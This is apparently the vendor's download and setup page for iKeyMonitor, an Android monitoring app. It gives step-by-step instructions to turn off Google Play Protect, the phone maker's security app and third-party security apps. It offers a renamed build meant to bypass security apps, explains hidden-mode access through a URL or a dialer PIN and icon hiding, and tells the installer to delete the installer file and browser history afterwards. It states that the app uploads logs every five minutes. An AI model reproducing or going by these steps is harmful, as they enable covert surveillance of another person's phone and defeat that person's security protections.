Download - iKeyMonitor for Android

STEP 1

Disable "Play Protect" and "Play

Store Notifications"

Turn Off "Scan device for security threats"

Find "Play Protect" from

locations below:

! Settings > Security

! Settings > Google > Security

! Play Store > My Profile > Play

Protect

Go to Settings > Apps > Google Play

Store > Notifications

STEP 2

Download iKeyMonitor below:

Weekly Build

(Changed name to bypass Security Apps.)

! Download iKeyMonitor Weekly Build

General Installer

(Fixed Package name. Remote update.)

! Download iKeyMonitor for Android

STEP 3

Install and Configure iKeyMonitor.

1. Tap on the downloaded

"iKeyMonitor-Android.apk" file to
install it.

If you can't open the downloaded file, then open

"Files" or other file explorer on your phone and go
to the "Downloads" folder to open and install it.

2. Open the app after installation.

If you choose "Done" after installation, find and

tap on the iKeyMonitor icon on the device screen
to launch the App.

There are 4 ways to

access the app.

! Visit
https://ikeymonitor.com/openapp
with the phone browser (Hidden
Mode)

! Dial PIN #8888* with the call dialing

pad (Hidden Mode)

! Tap on iKeyMonitor icon on

notification bar (Visible Mode)

! Tap on iKeyMonitor icon on home

screen (Visible Mode)

3. Follow the wizard to configure the

App.

Enable permissions to keep iKeyMonitor working

in the background and recording data.

! Display over other apps

! Accessibility

! Battery Optimization

! Usage Access

! Notification Access

4. Background App Protection

These settings are required to keep iKeyMonitor

running in the background. If not configured,
iKeyMonitor may be closed or limited in the
background.

Follow the guide for your phone(Eg: Samsung

Android 12 guide).

! Turn off Battery Saver.

! Exclude iKeyMonitor from Memory

Cleaners.

5. Security Protection

The settings are required to prevent the app from

being flagged or removed by secure apps. Skip it
if you do not have the listed secure apps installed.

! Disable System built-in Security

App by the Vendor.(Eg: Samsung
Device Care)

! Disable Google Play Protect and

Notification. (Ignore this if you have
already done it in the previous
steps.)

! Check the guide if you have 3rd

party security apps installed.

6. Hide/Display iKeyMonitor icon

You can disable the notification bar icon from the

wizard. To disable the icon on the home screen,
check the guide here.

7. Change Password and PIN

To prevent unauthorized access to iKeyMonitor on

the phone, you can change the password and PIN
from iKeyMonitor > Settings > Security.

8. Clean up the downloaded files

and browser history

After configuration, You need to delete the

downloaded installer and browser history.
iKeyMonitor uploads all the logs every 5 minutes
when the device screen is ON. When the screen is
Off (phone standby), only GPS and surrounding
records will be uploaded.
